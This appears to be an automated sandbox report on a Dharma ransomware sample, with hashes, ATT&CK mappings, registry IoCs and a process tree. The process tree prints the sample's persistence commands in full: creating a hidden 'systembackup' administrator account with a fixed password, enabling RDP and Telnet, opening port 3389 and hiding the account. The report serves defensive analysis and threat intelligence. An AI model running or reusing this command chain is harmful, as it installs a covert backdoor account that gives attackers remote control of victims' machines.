0b432f20d54647f077811ecb1df4dbc64fb17fbd6a9e0cce4ac9437d5f7891fb

Resubmissions

18-03-2024 22:36

240318-2h9hwsba88 10

Analysis

max time kernel
1796s
max time network
1161s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
18-03-2024 22:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ransomware/Dharma.exe
Size

11.5MB
MD5

928e37519022745490d1af1ce6f336f7
SHA1

b7840242393013f2c4c136ac7407e332be075702
SHA256

6fb303dd8ba36381948127d44bd8541e4a1ab8af07b46526ace08458f2498850
SHA512

8040195ab2b2e15c9d5ffa13a47a61c709738d1cf5e2108e848fedf3408e5bad5f2fc5f523f170f6a80cb33a4f5612d3d60dd343d028e55cfc08cd2f6ed2947c
SSDEEP

196608:JZnMy97vfgla5NX7YaP6uIEJsp+jb4agYSUpHm6g90MrYmhZZoG0tLzr1+W:LnMy9rfma5NrYaVzC0b4vpZZoG0tR+W

Score

9^/10

evasion persistence

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

2272 netsh.exe
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

1312 attrib.exe

pid	process
2272	netsh.exe

pid	process
1312	attrib.exe

Sets service image path in registry 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

mssql.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\mssqlaq.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\mssql.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\stzfrrjquvatbtka\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\stzfrrjquvatbtka.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\piucmkhdhvcpycok\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\piucmkhdhvcpycok.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\dxhzileruufdwkju\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\dxhzileruufdwkju.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\pspedmzdtmqminqaw\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\pspedmzdtmqminqaw.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mgcbznxqglsagv\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\mgcbznxqglsagv.sys"	mssql.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Dharma.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation Dharma.exe
Executes dropped EXE 4 IoCs

Processes:

nc123.exemssql.exemssql2.exeSearchHost.exe

pid process

4580 nc123.exe
1656 mssql.exe
1592 mssql2.exe
3156 SearchHost.exe
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

SearchHost.exe

description ioc process

File opened (read-only) \??\D: SearchHost.exe
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

4424 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation	Dharma.exe

pid	process
4580	nc123.exe
1656	mssql.exe
1592	mssql2.exe
3156	SearchHost.exe

description	ioc	process
File opened (read-only)	\??\D:	SearchHost.exe

pid	process
4424	sc.exe

Suspicious behavior: LoadsDriver 32 IoCs

Processes:

mssql.exe

pid	process
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe
1656	mssql.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

mssql.exemssql2.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeLoadDriverPrivilege	1656	mssql.exe
Token: SeDebugPrivilege	1592	mssql2.exe
Token: SeIncreaseQuotaPrivilege	2836	WMIC.exe
Token: SeSecurityPrivilege	2836	WMIC.exe
Token: SeTakeOwnershipPrivilege	2836	WMIC.exe
Token: SeLoadDriverPrivilege	2836	WMIC.exe
Token: SeSystemProfilePrivilege	2836	WMIC.exe
Token: SeSystemtimePrivilege	2836	WMIC.exe
Token: SeProfSingleProcessPrivilege	2836	WMIC.exe
Token: SeIncBasePriorityPrivilege	2836	WMIC.exe
Token: SeCreatePagefilePrivilege	2836	WMIC.exe
Token: SeBackupPrivilege	2836	WMIC.exe
Token: SeRestorePrivilege	2836	WMIC.exe
Token: SeShutdownPrivilege	2836	WMIC.exe
Token: SeDebugPrivilege	2836	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2836	WMIC.exe
Token: SeRemoteShutdownPrivilege	2836	WMIC.exe
Token: SeUndockPrivilege	2836	WMIC.exe
Token: SeManageVolumePrivilege	2836	WMIC.exe
Token: 33	2836	WMIC.exe
Token: 34	2836	WMIC.exe
Token: 35	2836	WMIC.exe
Token: 36	2836	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2836	WMIC.exe
Token: SeSecurityPrivilege	2836	WMIC.exe
Token: SeTakeOwnershipPrivilege	2836	WMIC.exe
Token: SeLoadDriverPrivilege	2836	WMIC.exe
Token: SeSystemProfilePrivilege	2836	WMIC.exe
Token: SeSystemtimePrivilege	2836	WMIC.exe
Token: SeProfSingleProcessPrivilege	2836	WMIC.exe
Token: SeIncBasePriorityPrivilege	2836	WMIC.exe
Token: SeCreatePagefilePrivilege	2836	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

SearchHost.exe

pid process

3156 SearchHost.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

SearchHost.exe

pid process

3156 SearchHost.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

mssql.exemssql2.exeSearchHost.exe

pid process

1656 mssql.exe
1656 mssql.exe
1592 mssql2.exe
1592 mssql2.exe
3156 SearchHost.exe
1656 mssql.exe

pid	process
3156	SearchHost.exe

pid	process
3156	SearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Dharma.exenc123.execmd.execmd.exenet.exenet.execmd.exenet.exenet.exe

description	pid	process	target process
PID 740 wrote to memory of 4580	740	Dharma.exe	nc123.exe
PID 740 wrote to memory of 4580	740	Dharma.exe	nc123.exe
PID 740 wrote to memory of 4580	740	Dharma.exe	nc123.exe
PID 740 wrote to memory of 1656	740	Dharma.exe	mssql.exe
PID 740 wrote to memory of 1656	740	Dharma.exe	mssql.exe
PID 740 wrote to memory of 1592	740	Dharma.exe	mssql2.exe
PID 740 wrote to memory of 1592	740	Dharma.exe	mssql2.exe
PID 740 wrote to memory of 1592	740	Dharma.exe	mssql2.exe
PID 740 wrote to memory of 2220	740	Dharma.exe	cmd.exe
PID 740 wrote to memory of 2220	740	Dharma.exe	cmd.exe
PID 740 wrote to memory of 2220	740	Dharma.exe	cmd.exe
PID 740 wrote to memory of 1888	740	Dharma.exe	cmd.exe
PID 740 wrote to memory of 1888	740	Dharma.exe	cmd.exe
PID 740 wrote to memory of 1888	740	Dharma.exe	cmd.exe
PID 740 wrote to memory of 3156	740	Dharma.exe	SearchHost.exe
PID 740 wrote to memory of 3156	740	Dharma.exe	SearchHost.exe
PID 740 wrote to memory of 3156	740	Dharma.exe	SearchHost.exe
PID 4580 wrote to memory of 3228	4580	nc123.exe	cmd.exe
PID 4580 wrote to memory of 3228	4580	nc123.exe	cmd.exe
PID 4580 wrote to memory of 3228	4580	nc123.exe	cmd.exe
PID 1888 wrote to memory of 4276	1888	cmd.exe	cmd.exe
PID 1888 wrote to memory of 4276	1888	cmd.exe	cmd.exe
PID 1888 wrote to memory of 4276	1888	cmd.exe	cmd.exe
PID 4276 wrote to memory of 2836	4276	cmd.exe	WMIC.exe
PID 4276 wrote to memory of 2836	4276	cmd.exe	WMIC.exe
PID 4276 wrote to memory of 2836	4276	cmd.exe	WMIC.exe
PID 4276 wrote to memory of 3968	4276	cmd.exe	find.exe
PID 4276 wrote to memory of 3968	4276	cmd.exe	find.exe
PID 4276 wrote to memory of 3968	4276	cmd.exe	find.exe
PID 1888 wrote to memory of 2924	1888	cmd.exe	net.exe
PID 1888 wrote to memory of 2924	1888	cmd.exe	net.exe
PID 1888 wrote to memory of 2924	1888	cmd.exe	net.exe
PID 2924 wrote to memory of 1244	2924	net.exe	net1.exe
PID 2924 wrote to memory of 1244	2924	net.exe	net1.exe
PID 2924 wrote to memory of 1244	2924	net.exe	net1.exe
PID 1888 wrote to memory of 632	1888	cmd.exe	net.exe
PID 1888 wrote to memory of 632	1888	cmd.exe	net.exe
PID 1888 wrote to memory of 632	1888	cmd.exe	net.exe
PID 632 wrote to memory of 3456	632	net.exe	net1.exe
PID 632 wrote to memory of 3456	632	net.exe	net1.exe
PID 632 wrote to memory of 3456	632	net.exe	net1.exe
PID 1888 wrote to memory of 4040	1888	cmd.exe	cmd.exe
PID 1888 wrote to memory of 4040	1888	cmd.exe	cmd.exe
PID 1888 wrote to memory of 4040	1888	cmd.exe	cmd.exe
PID 4040 wrote to memory of 3772	4040	cmd.exe	WMIC.exe
PID 4040 wrote to memory of 3772	4040	cmd.exe	WMIC.exe
PID 4040 wrote to memory of 3772	4040	cmd.exe	WMIC.exe
PID 4040 wrote to memory of 3768	4040	cmd.exe	find.exe
PID 4040 wrote to memory of 3768	4040	cmd.exe	find.exe
PID 4040 wrote to memory of 3768	4040	cmd.exe	find.exe
PID 1888 wrote to memory of 4544	1888	cmd.exe	net.exe
PID 1888 wrote to memory of 4544	1888	cmd.exe	net.exe
PID 1888 wrote to memory of 4544	1888	cmd.exe	net.exe
PID 4544 wrote to memory of 3272	4544	net.exe	net1.exe
PID 4544 wrote to memory of 3272	4544	net.exe	net1.exe
PID 4544 wrote to memory of 3272	4544	net.exe	net1.exe
PID 1888 wrote to memory of 1500	1888	cmd.exe	net.exe
PID 1888 wrote to memory of 1500	1888	cmd.exe	net.exe
PID 1888 wrote to memory of 1500	1888	cmd.exe	net.exe
PID 1500 wrote to memory of 3664	1500	net.exe	net1.exe
PID 1500 wrote to memory of 3664	1500	net.exe	net1.exe
PID 1500 wrote to memory of 3664	1500	net.exe	net1.exe
PID 1888 wrote to memory of 1408	1888	cmd.exe	reg.exe
PID 1888 wrote to memory of 1408	1888	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

1312 attrib.exe

pid	process
1312	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Ransomware\Dharma.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware\Dharma.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:740

C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\nc123.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\nc123.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cls
3⤵
PID:3228

C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe"
2⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1656

C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1592

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\Shadow.bat" "
2⤵
PID:2220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\systembackup.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
3⤵
- Suspicious use of WriteProcessMemory
PID:4276

C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2836

C:\Windows\SysWOW64\find.exe
Find "="
4⤵
PID:3968

C:\Windows\SysWOW64\net.exe
net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
3⤵
- Suspicious use of WriteProcessMemory
PID:2924

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
4⤵
PID:1244

C:\Windows\SysWOW64\net.exe
net localgroup Administrators systembackup /add
3⤵
- Suspicious use of WriteProcessMemory
PID:632

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup Administrators systembackup /add
4⤵
PID:3456

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
3⤵
- Suspicious use of WriteProcessMemory
PID:4040

C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
4⤵
PID:3772

C:\Windows\SysWOW64\find.exe
Find "="
4⤵
PID:3768

C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" systembackup /add
3⤵
- Suspicious use of WriteProcessMemory
PID:4544

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
4⤵
PID:3272

C:\Windows\SysWOW64\net.exe
net accounts /forcelogoff:no /maxpwage:unlimited
3⤵
- Suspicious use of WriteProcessMemory
PID:1500

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
4⤵
PID:3664

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
3⤵
PID:1408

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
3⤵
PID:1328

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
3⤵
PID:4488

C:\Windows\SysWOW64\attrib.exe
attrib C:\users\systembackup +r +a +s +h
3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1312

C:\Windows\SysWOW64\netsh.exe
netsh firewall add portopening TCP 3389 "Remote Desktop"
3⤵
- Modifies Windows Firewall
PID:2272

C:\Windows\SysWOW64\sc.exe
sc config tlntsvr start=auto
3⤵
- Launches sc.exe
PID:4424

C:\Windows\SysWOW64\net.exe
net start Telnet
3⤵
PID:4396

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Telnet
4⤵
PID:4928

C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe"
2⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3156

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:1512

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
PID:1340

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\Everything.ini
Filesize
19KB

MD5
5531bbb8be242dfc9950f2c2c8aa0058

SHA1
b08aadba390b98055c947dce8821e9e00b7d01ee

SHA256
4f03ab645fe48bf3783eb58568e89b3b3401956dd17cb8049444058dab0634d7

SHA512
3ce7e1d7b330cc9d75c3ce6d4531afe6bfa210a0bcbb45d4a7c29aabff79bebf3263fe0b5377956e2f88036b466383f001a7a6713da04a411b1aceb42bc38291

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe
Filesize
1024KB

MD5
1dbd041df79064abbd34c2dac1e4a8f1

SHA1
56475142e3597c6fd351c28c57a6919787ea02d9

SHA256
3d0934698293a599453d506298df879ebf9194f7e287f91e98f99b719f92eb07

SHA512
c8891389c72624a76a4f7d92beffc4c0f0ff167a641f7aec47af273c360d7809eb1cb08172d70b328694962f4d9aaa024bc84e8fcaf84e5637501e21368ff5a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe
Filesize
1.1MB

MD5
d455eb9a1e315b831596cbf364199f1b

SHA1
34996b9d9ea88e4dd140dfdb230c5a6a08c56551

SHA256
8a783e7148943736032cd443cfb05692a2bba905a3a0d76657eaa1ecefa39bfc

SHA512
b85979a9bb04b1348dc5caee2eb7ae57e2f3ff19425a1dbd054cb56f55d7f8596ef02b2d4f44dfd5b37f7b600fc26575d6bcd47e7ab13d99f8474552e4ac8929

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\Shadow.bat
Filesize
28B

MD5
df8394082a4e5b362bdcb17390f6676d

SHA1
5750248ff490ceec03d17ee9811ac70176f46614

SHA256
da3f155cfb98ce0add29a31162d23da7596da44ba2391389517fe1a2790da878

SHA512
8ce519dc5c2dd0bbb9f7f48bedf01362c56467800ac0029c8011ee5d9d19e3b3f2eff322e7306acf693e2edb9cf75caaf7b85eb8b2b6c3101ff7e1644950303d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe
Filesize
4.9MB

MD5
d8a964086d319638b3a087e2261b63b8

SHA1
6835c2f2635dfbb3b070539856932b7c0ff5ed0b

SHA256
60cee13153e037e61504d3447951130affa182102c0da162d412186b11a184d3

SHA512
d49d02384c4248fcaaf89dca542beca22ea7bf36fc230430cf03d8c163373dd76fc853c0e941e276ac9ea5ee3a5360c9e54dcd521c5933a13ec9a576719777a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe
Filesize
4.6MB

MD5
bb287329491091d4a7bb1abc8a7fb449

SHA1
ea988f76999e558b7acf2f068f9f9d2f2bca2c57

SHA256
290869a12be65068838e51369a27dc5dae0d2e4ced08a80471fcbfef5e17ab07

SHA512
31e92c5ec391c1bf4471a41e517e1493e9c6b478d533a1bbfe59f7d73e40bf5e00140dfb6e7144df727bd548111fba4076f7c97d656c12ddea34ec3559992ae7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe
Filesize
4.4MB

MD5
f9d7096ff5b12428f22ae58e09b82186

SHA1
2b59a19b1b380ee47f19ae2b2bb9ad0c478c92bf

SHA256
d76322c4fef9f6735b90c0bc903458e061df38ff47d13ec2d224e1bd5efb10cb

SHA512
ac01ecee28bd7d4d0efd3a40ff2ea567d6e379a334751110af80eee9ff9092fbfdb016f8990d1cfa56d0abeb5e6c95523daedfebbb3c76c8f18ef4629920189f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe
Filesize
2.1MB

MD5
dd59f0df3a88eb922fb33dc64eea1623

SHA1
c9a7912fda1f862f1634adfb6b3662208d476516

SHA256
648c4aea734b7bdb032ee88604575a60bb3a4ba2b186d133f2a3cfb0a7e78d05

SHA512
9ca19980d4a1e5b1be48ca950ef2a137edb90dc3bcd24b178440d5827b6e379bd1a3a1f310262e150b7b93614bfca36ea789ffb1f5d4955c96712aa0b673528b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe
Filesize
1.5MB

MD5
e10324677becf7720b165176c9abd305

SHA1
ece77806a08d4780a9e077107f4d862fc7acb393

SHA256
f7cc91e89331b01b8177f0e6e0808760661f25b3ae759498df5dbee66e4f8757

SHA512
4ceea7fc0a1bd14e7b3987a4b8e925b9d08f48716798fd2666b180e7374dbed41b9bb1ca895c3fca39b55838f3ad5e81d2fa1509bad4ece849aa787c98cfd296

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe
Filesize
4.4MB

MD5
6fb9b8f3d9136f53d98d6bfbf7869c62

SHA1
a127c3fd16d5945e907542a9d5a434e29c3a0dc4

SHA256
1b298b50adba8250abb8923d2aa7c9c8b33ba7e3f8e17c7965829448e31bc851

SHA512
16b2edccc82e653a4bc7ae26bc49d4db2e00129823a1a4ffde585e23987bec857c860885f5b1e4ab359b5d60fe296c88f366101aa918f7fe7793fccfb681433c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\nc123.exe
Filesize
125KB

MD5
597de376b1f80c06d501415dd973dcec

SHA1
629c9649ced38fd815124221b80c9d9c59a85e74

SHA256
f47e3555461472f23ab4766e4d5b6f6fd260e335a6abc31b860e569a720a5446

SHA512
072565912208e97cc691e1a102e32fd6c243b5a3f8047a159e97aabbe302bddc36f3c52cecde3b506151bc89e0f3b5acf6552a82d83dac6e0180c873d36d3f6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\stzfrrjquvatbtka.sys
Filesize
674KB

MD5
b2233d1efb0b7a897ea477a66cd08227

SHA1
835a198a11c9d106fc6aabe26b9b3e59f6ec68fd

SHA256
5fd17e3b8827b5bb515343bc4066be0814f6466fb4294501becac284a378c0da

SHA512
6ca61854db877d767ce587ac3d7526cda8254d937a159fd985e0475d062d07ae83e7ff4f9f42c7e1e1cad5e1f408f6849866aa4e9e48b29d80510e5c695cee37

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\systembackup.bat
Filesize
1KB

MD5
b4b2f1a6c7a905781be7d877487fc665

SHA1
7ee27672d89940e96bcb7616560a4bef8d8af76c

SHA256
6246b0045ca11da483e38317421317dc22462a8d81e500dee909a5269c086b5f

SHA512
f883cea56a9ac5dcb838802753770494ce7b1de9d7da6a49b878d534810f9c87170f04e0b8b516ae19b9492f40635a72b3e8a4533d39312383c520abe00c5ae6

Download Submit
memory/1340-225-0x000001DD940B0000-0x000001DD940B1000-memory.dmp

Filesize
4KB

Download
memory/1340-189-0x000001DD8BB40000-0x000001DD8BB50000-memory.dmp

Filesize
64KB

Download
memory/1340-224-0x000001DD93FA0000-0x000001DD93FA1000-memory.dmp

Filesize
4KB

Download
memory/1340-223-0x000001DD93FA0000-0x000001DD93FA1000-memory.dmp

Filesize
4KB

Download
memory/1340-221-0x000001DD93F70000-0x000001DD93F71000-memory.dmp

Filesize
4KB

Download
memory/1340-205-0x000001DD8BC40000-0x000001DD8BC50000-memory.dmp

Filesize
64KB

Download
memory/1592-160-0x00000000767E0000-0x00000000768D0000-memory.dmp

Filesize
960KB

Download
memory/1592-166-0x00000000767E0000-0x00000000768D0000-memory.dmp

Filesize
960KB

Download
memory/1592-165-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/1592-164-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/1592-154-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/1656-176-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/1656-168-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/1656-163-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download